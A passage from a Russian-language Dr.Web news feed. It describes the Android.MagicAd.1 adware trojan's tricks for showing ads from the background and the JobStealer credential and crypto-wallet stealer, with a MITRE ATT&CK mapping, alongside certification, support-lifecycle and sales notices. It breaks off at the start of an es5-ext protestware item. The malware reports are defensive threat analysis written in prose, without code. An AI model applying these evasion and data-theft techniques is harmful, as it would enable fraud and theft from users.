        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Примеры рекламы, которую демонстрирует Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Одна из&amp;nbsp;методик реализуется через намерения (Intent), адресованные другим приложениям. Она позволяет трояну обойти ограничения современных версий ОС&amp;nbsp;Android, не&amp;nbsp;позволяющие программам запускать самих себя. В&amp;nbsp;зависимости от&amp;nbsp;модели зараженного устройства, с&amp;nbsp;помощью этой техники &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; либо сам демонстрирует объявления, либо непосредственно &amp;laquo;заставляет&amp;raquo; целевые программы показывать баннеры с&amp;nbsp;рекламой.&lt;/p&gt;

&lt;p&gt;В&amp;nbsp;одном из&amp;nbsp;вариантов данного способа целью трояна являются:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        браузер Mi&amp;nbsp;Browser на&amp;nbsp;устройствах Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        графическая оболочка Miui SystemUI на&amp;nbsp;устройствах Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        лончер Amazon Fire TV&amp;nbsp;Home Screen на&amp;nbsp;устройствах Amazon&amp;nbsp;TV.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Все это&amp;nbsp;&amp;mdash; системные приложения на&amp;nbsp;соответствующих устройствах, поэтому они способны обрабатывать намерения, даже когда не&amp;nbsp;запущены пользователем напрямую. Пока эти программы активны и&amp;nbsp;могут принимать намерения, &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; может использовать их&amp;nbsp;для показа объявлений.&lt;/p&gt;

&lt;p&gt;Стоит отметить, что если Mi&amp;nbsp;Browser установлен на&amp;nbsp;устройстве Xiaomi не&amp;nbsp;как системное приложение, троян также может использовать эту программу для демонстрации рекламы&amp;nbsp;&amp;mdash; до&amp;nbsp;тех пор, пока окно браузера не&amp;nbsp;будет закрыто.&lt;/p&gt;

&lt;p&gt;Когда &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; обнаруживает Mi&amp;nbsp;Browser на&amp;nbsp;подходящем устройстве, он&amp;nbsp;отправляет отложенное намерение для запуска рекламы своему dex-компоненту (детектируется Dr.Web как &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;). Тот формирует из&amp;nbsp;него собственное намерение и&amp;nbsp;передает браузеру, который извлекает исходное намерение и&amp;nbsp;в&amp;nbsp;соответствии с&amp;nbsp;ним запускает рекламу.&lt;/p&gt;

&lt;p&gt;Взаимодействие с&amp;nbsp;двумя другими программами несколько отличается&amp;nbsp;&amp;mdash; они используются для вызова трояна из&amp;nbsp;фонового режима. Вначале &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; отправляет модулю &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; отложенное намерение для запуска рекламы, и&amp;nbsp;тот передает целевым программам собственное намерение для своего пробуждения. Если это приложение Miui SystemUI, оно в&amp;nbsp;ответ отправляет свое намерение для запуска модуля. Если&amp;nbsp;же целевой программой является Amazon Fire TV&amp;nbsp;Home Screen, она запускает модуль напрямую&amp;nbsp;&amp;mdash; по&amp;nbsp;имени его пакета. Получив управление, модуль &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.origin&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; запускает рекламу, которая поступила ему в&amp;nbsp;отложенном намерении от&amp;nbsp;основного вредоносного приложения.&lt;/p&gt;

&lt;p&gt;Если трояну не&amp;nbsp;удается показать рекламу, он&amp;nbsp;пытается использовать этот способ еще дважды, и&amp;nbsp;в&amp;nbsp;случае неудачи пытается показать рекламу напрямую, уже не&amp;nbsp;задействуя отложенные намерения и&amp;nbsp;свой вредоносный dex-модуль.&lt;/p&gt;

&lt;p&gt;Другая вариация этого способа похожа на&amp;nbsp;предыдущую и&amp;nbsp;применяется для эксплуатации программ на&amp;nbsp;устройствах Vivo. Она отличается тем, что запуск рекламы происходит при помощи Android Binder&amp;nbsp;&amp;mdash; системного компонента, обеспечивающего взаимодействие между процессами. В&amp;nbsp;данном случае троян нацелен на&amp;nbsp;следующие системные программы:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager,
    &lt;/li&gt;
    &lt;li&gt;
        Телефонная книга,
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser,
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; запускает их&amp;nbsp;через Android Binder, отправляя ему обычные намерения через контейнер данных Parcel. Эти программы затем запускают троянский компонент &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.origin&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt;, который после выхода из&amp;nbsp;фонового режима показывает рекламу.&lt;/p&gt;

&lt;p&gt;В&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; также предусмотрено несколько других методик для демонстрации рекламы при работе в&amp;nbsp;фоне, среди них&amp;nbsp;&amp;mdash; использование медиаплеера. В&amp;nbsp;отличие от&amp;nbsp;способов, нацеленных на&amp;nbsp;определенные устройства, этот метод является универсальным и&amp;nbsp;работает на&amp;nbsp;большинстве моделей от&amp;nbsp;различных производителей. &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; расшифровывает из&amp;nbsp;своего тела аудиофайл и&amp;nbsp;сохраняет его в&amp;nbsp;рабочую директорию. Затем вредоносная программа запускает свой экземпляр системного медиаплеера, задает в&amp;nbsp;нем минимальную громкость и&amp;nbsp;связывает его с&amp;nbsp;глобальной системой управления мультимедиа ОС&amp;nbsp;Android. Далее для запуска рекламы &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; устанавливает широковещательный приемник, отслеживающий нажатия в&amp;nbsp;этом плеере. Затем троян при помощи специальной adb-команды имитирует действия пользователя, нажимая в&amp;nbsp;плеере кнопку записи, после чего сразу&amp;nbsp;же закрывает его окно. Нажатие кнопки приводит к&amp;nbsp;срабатыванию системного медиаприемника, который позволяет &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; перехватить управление и&amp;nbsp;запустить рекламу.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space для мобильных устройств надежно детектирует и&amp;nbsp;удаляет все известные версии вредоносной программы &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, поэтому для наших пользователей она опасности не&amp;nbsp;представляет.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15258&amp;lng=ru</guid><title>Получены сертификаты соответствия ФСБ России на продукты Dr.Web Mobile Security Suite и Dr.Web Katana</title><link>https://news.drweb.ru/show/?i=15258&amp;lng=ru&amp;c=5</link><pubDate>Wed, 27 May 2026 14:06:42 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» сообщает, что получены новые &lt;a href="https://company.drweb.ru/licenses_and_certificates/fsb/"&gt;сертификаты соответствия ФСБ России&lt;/a&gt; на программные продукты Dr.Web Mobile Security Suite и Dr.Web Katana.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Рекомендуем пользователям сертифицированных версий обновить ПО после истечения срока действия сертификата.&lt;/p&gt;&lt;h3&gt;Подробнее о продуктах&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Mobile Security Suite для ОС Android:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;версия 12.9,&lt;/li&gt;&lt;li&gt;сертификат соответствия № СФ/СЗИ-0888,&lt;/li&gt;&lt;li&gt;срок действия: 15.05.2026 — 01.05.2031,&lt;/li&gt;&lt;li&gt;средство антивирусной защиты Класса В2 в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности», может использоваться для защиты информации, в том числе содержащей сведения, составляющие государственную тайну,&lt;/li&gt;&lt;li&gt;предназначено для защиты мобильных устройств, работающих под управлением операционной системы ОС Android, а также телевизоров, медиапроигрывателей и игровых консолей, работающих на платформе Android TV, от вирусных угроз, созданных специально для этих устройств.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Katana:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;версия 2.0,&lt;/li&gt;&lt;li&gt;сертификат соответствия ФСБ России № СФ/СЗИ-0887,&lt;/li&gt;&lt;li&gt;срок действия: 15.05.2026 — 01.05.2031,&lt;/li&gt;&lt;li&gt;средство антивирусной защиты Класса Д в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности», может использоваться для защиты информации, в том числе содержащей сведения, составляющие государственную тайну,&lt;/li&gt;&lt;li&gt;защищает систему от компьютерных угроз с помощью несигнатурных методов: анализирует поведение процессов, использует облачные технологии обнаружения угроз и предустановленные правила.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Напоминаем, что поставки лицензий на сертифицированные продукты Dr.Web сопровождаются полным комплектом сертификационных материалов.&lt;/p&gt;&lt;p&gt;По вопросам обновления ПО или приобретения продуктов Dr.Web обращайтесь к партнерам или к специалистам &lt;a href="https://support.drweb.ru/"&gt;Службы поддержки продаж «Доктор Веб»&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15257&amp;lng=ru</guid><title>Изменение сроков поддержки продуктов Dr.Web</title><link>https://news.drweb.ru/show/?i=15257&amp;lng=ru&amp;c=5</link><pubDate>Tue, 26 May 2026 14:03:15 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;В соответствии с политикой жизненного цикла продлены сроки поддержки ряда продуктов Dr.Web.&lt;/newslead&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Центр управления Dr.Web Enterprise Security Suite, версия 13.0&lt;/li&gt;&lt;li&gt;Dr.Web Industrial, версия 13.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;В составе Dr.Web Desktop Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 для рабочих станций Windows&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 для рабочих станций macOS&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 для рабочих станций Linux&lt;/li&gt;&lt;li&gt;Dr.Web Katana Business Edition 1.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;В составе Dr.Web Server Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 для серверов Windows&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 для серверов UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 для серверов macOS&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;В составе Dr.Web Mail Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 для почтовых серверов UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 для Microsoft Exchange Server&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;В составе Dr.Web Gateway Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 для интернет-шлюзов UNIX&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;В составе Dr.Web Mobile Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 для мобильных устройств Android&lt;/li&gt;&lt;li&gt;Dr.Web 3.0 для мобильных устройств Аврора&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Обновлённая информация о сроках поддержки доступна на &lt;a href="https://support.drweb.com/lifecycle/"&gt;странице жизненного цикла продуктов&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15253&amp;lng=ru</guid><title>Вместо работы — украденные данные и деньги. В поддельных приложениях для онлайн-собеседований скрывается троян-стилер, который атакует пользователей macOS и Windows</title><link>https://news.drweb.ru/show/?i=15253&amp;lng=ru&amp;c=5</link><pubDate>Thu, 07 May 2026 20:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Эксперты «Доктор Веб» предупреждают о распространении троянской программы JobStealer, похищающей конфиденциальную информацию у пользователей компьютеров под управлением macOS и Windows. В первую очередь она нацелена на кражу данных из криптокошельков. Мошенники под предлогом проведения онлайн-собеседований заманивают потенциальных жертв на вредоносные сайты, где предлагают установить приложение для видеоконференций. В действительности это ПО — и есть троян JobStealer.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Атака начинается с того, что злоумышленники связываются с потенциальными жертвами и предлагают им ту или иную вакансию. Они приглашают пользователей пройти собеседование и предоставляют им ссылки на сайты «платформ» для проведения онлайн-встреч — якобы для подключения к видеоконференции. Эти сайты имеют презентабельный вид, но на самом деле являются мошенническими. С них под видом программы для онлайн-конференций скачивается вредоносная программа JobStealer. При этом киберпреступники используют различное оформление таких интернет-ресурсов, а также меняют имена самой программы. Наши специалисты встречали варианты с названиями MeetLab, Juseo, Meetix, Carolla и другие. В ряде случаев киберпреступники используют названия настоящих сервисов, таких как Webex.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Примеры сайтов поддельных сервисов онлайн-конференций, с которых скачивается JobStealer&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Чтобы пользователи поверили, что платформы являются полноценно функционирующими, мошенники создают соответствующие телеграм-каналы и аккаунты в социальных сетях — например, X.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Для маскировки трояна под легитимное ПО злоумышленники создают видимость активности в социальных сетях&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Для установки программы на устройства с macOS посетителям вредоносных сайтов предлагается две опции:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;скопировать и выполнить в терминале bash-команду, указанную на сайте;&lt;/li&gt;&lt;li&gt;скачать файл образа диска в формате &lt;span class="string"&gt;.dmg&lt;/span&gt; и запустить его.&lt;/li&gt;&lt;/ul&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Троян JobStealer скачивается с вредоносных сайтов как в виде dmg-контейнера, так и через выполнение bash-команды в терминале&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В первом случае при выполнении команды в терминале из интернета автоматически загружается и исполняется скрипт, который скачивает и запускает исполняемый файл JobStealer (детектируется как&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Mac.PWS.JobStealer.1&amp;lng=ru"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;&lt;p&gt;Во втором случае предлагаемый к загрузке dmg-образ изначально содержит указанные выше файлы. При монтировании он демонстрирует инструкцию по «установке» приложения. В ней указано, что пользователю необходимо открыть терминал и перетащить в его окно прилагаемый скрипт. На самом деле вместо установки ПО для видеоконференций скрипт запустит троянский файл.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Изображение с инструкцией, которое демонстрируется при открытии файла образа с трояном JobStealer&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Mac.PWS.JobStealer.1&amp;lng=ru"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;представляет собой исполняемый файл-контейнер в формате Fat Mach-O и содержит двоичный код сразу для нескольких процессорных архитектур — x64 и arm64. В зависимости от платформы зараженного компьютера при запуске трояна автоматически задействуется компонент, соответствующий целевому процессору.&lt;/p&gt;&lt;p&gt;Отметим, что существуют различные версии&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Mac.PWS.JobStealer.1&amp;lng=ru"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;. Более ранние варианты вредоносного приложения не поддерживали работу на компьютерах Mac с архитектурой arm64. В них также отсутствовала обфускация — ее вирусописатели начали добавлять и усиливать по мере обновления стилера.&lt;/p&gt;&lt;p&gt;После запуска&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Mac.PWS.JobStealer.1&amp;lng=ru"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;демонстрирует фишинговое окно, где сообщает о якобы возникшей ошибке в работе. Для ее «исправления» вредоносная программа просит пользователя указать пароль от его учетной записи.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Фишинговое окно, в котором запрашивается пароль от учетной записи пользователя Mac&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Далее&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Mac.PWS.JobStealer.1&amp;lng=ru"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;собирает следующие данные:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;версию операционной системы и идентификатор компьютера;&lt;/li&gt;&lt;li&gt;данные порядка 300 браузерных расширений-криптокошельков, установленных в целевых браузерах на базе Chomium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, CocCoc);&lt;/li&gt;&lt;li&gt;файлы cookie из этих браузеров;&lt;/li&gt;&lt;li&gt;пароли, а также данные банковских карт, сохраненные в браузерных списках автозаполнения форм;&lt;/li&gt;&lt;li&gt;файлы мессенджера Телеграм из директорий &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; и &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, где хранятся сессионные ключи авторизации, загружаемые файлы и т. п.;&lt;/li&gt;&lt;li&gt;пользовательские заметки из нативного для macOS приложения Notes;&lt;/li&gt;&lt;li&gt;наличие в системе приложений криптокошельков Ledger Live и Trezor Suite.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Эти данные помещаются в ZIP-архив и загружаются на C2-сервер.&lt;/p&gt;&lt;p&gt;Вирусописатели также подготовили версию трояна JobStealer и для компьютеров под управлением ОС Windows. Его функциональность аналогична версии для macOS. Кроме того, на некоторых вредоносных сайтах, распространяющих стилера, предусмотрены разделы для загрузки приложения на другие популярные операционные системы. Однако на данный момент наши вирусные аналитики не зафиксировали их распространение. Например, кнопка загрузки программы для ОС Linux либо неактивна, либо ведет на Windows-версию трояна. А в разделах для скачивания программы для устройств на базе iOS и Android говорится, что эти версии находятся в разработке. При этом нельзя исключать, что злоумышленники в дальнейшем начнут распространять варианты трояна и для данных платформ.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Вредоносные сайты потенциально могут распространять версии трояна JobStealer для Linux, iOS и Android&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Все известные модификации вредоносного приложения JobStealer надежно детектируются и удаляются антивирусными продуктами Dr.Web Security Space для macOS и Windows и не представляют угрозы для наших пользователей. Распространяющие трояна мошеннические сайты добавлены в базу нерекомендуемых и опасных ресурсов и также блокируются Dr.Web.&lt;/p&gt;&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;&lt;p&gt;Мы проанализировали вредоносную программу JobStealer по фреймворку MITRE ATT&amp;amp;CK®, который представляет собой матрицу с описанием тактик и техник киберпреступников, атакующих информационные системы. В результате были выявлены следующие ключевые техники:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Этап&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Техника&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Выполнение&lt;/td&gt;&lt;td&gt;&lt;p&gt;Выполнение с участием пользователя (T1204)&lt;/p&gt;&lt;p&gt;Вредоносное копирование и вставка (T1204.004)&lt;/p&gt;&lt;p&gt;Вредоносный файл (T1204.002)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Обнаружение&lt;/td&gt;&lt;td&gt;Обнаружение файлов и каталогов (T1083)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Сбор данных&lt;/td&gt;&lt;td&gt;&lt;p&gt;Автоматизированный сбор (T1119)&lt;/p&gt;&lt;p&gt;Данные из локальной системы (T1005)&lt;/p&gt;&lt;p&gt;Учетные данные из хранилищ паролей (T1555)&lt;/p&gt;&lt;p&gt;Связка ключей (T1555.001)&lt;/p&gt;&lt;p&gt;Учетные данные из браузеров (T1555.003)&lt;/p&gt;&lt;p&gt;Перехват вводимых данных (T1056)&lt;/p&gt;&lt;p&gt;Перехват ввода в графическом интерфейсе (T1056.002)&lt;/p&gt;&lt;p&gt;Архивация собранных данных (T1560)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Организация управления&lt;/td&gt;&lt;td&gt;Веб-служба (T1102)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Эксфильтрация данных&lt;/td&gt;&lt;td&gt;&lt;p&gt;Автоматизированная эксфильтрация (T1020)&lt;/p&gt;&lt;p&gt;Эксфильтрация по каналу управления (T1041)&lt;/p&gt;&lt;p&gt;Эксфильтрация через веб-службу (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;p&gt;Подробнее о&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Mac.PWS.JobStealer.1&amp;lng=ru"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15149&amp;lng=ru</guid><title>Скидка 22%: специальная акция в честь дня рождения Dr.Web</title><link>https://news.drweb.ru/show/?i=15149&amp;lng=ru&amp;c=5</link><pubDate>Mon, 20 Apr 2026 16:39:08 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;22 апреля — знаменательная дата в истории информационной безопасности. В этот день мы празднуем двойной День Рождения: антивируса Dr.Web и его создателя, Игоря Данилова. 34 года назад был создан антивирус Dr.Web, который сегодня надежно защищает миллионы компьютеров, серверов, терминалов, смартфонов и других устройств по всему миру.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;В честь этого праздника, мы запустили специальную акцию — скидку 22% на двухлетние лицензии Dr.Web. Условия праздничного предложения:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;вы можете защитить свои персональные компьютеры и смартфоны с помощью Dr.Web Security Space и Dr.Web Security Space для мобильных устройств,&lt;/li&gt;&lt;li&gt;возможно приобрести лицензию на 1— 5 устройств,&lt;/li&gt;&lt;li&gt;срок действия акции: с 20 по 27 апреля.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Успейте воспользоваться выгодным предложением и забыть о киберугрозах на целых 2 года!&amp;nbsp;&lt;br&gt;&lt;a class="btn" href="https://www.drweb.ru/landing/bday2026"&gt;Купить со скидкой&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15146&amp;lng=ru</guid><title>Антироссийский призыв в консоли разработчика вместе с обновлением Microsoft Visual Studio Code</title><link>https://news.drweb.ru/show/?i=15146&amp;lng=ru&amp;c=5</link><pubDate>Fri, 17 Apr 2026 15:44:22 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;«Доктор Веб» сообщает, что при установке новой версии популярного редактора кода Microsoft Visual Studio Code (MS VS Code) Dr.Web детектирует &lt;a href="https://vms.drweb.ru/virus/?i=25072314"&gt;вредоносный JS файл&lt;/a&gt; внутри. Данный вредоносный код &lt;a href="https://github.com/medikoo/es5-ext/commit/28de285ed433b45113f01e4ce7c74e9a356b2af2"&gt;был добавлен&lt;/a&gt; в javascript-библиотеку "es5-ext"&lt;strong&gt; &lt;/strong&gt;еще в 2022 году и до сих пор в ней содержится.&lt;/newslead&gt;&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Что делает вредоносный JS-файл&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Вредоносный файл демонстрирует в консоли разработчика призыв с антироссийской позицией касательно СВО:&lt;/p&gt;&lt;figure 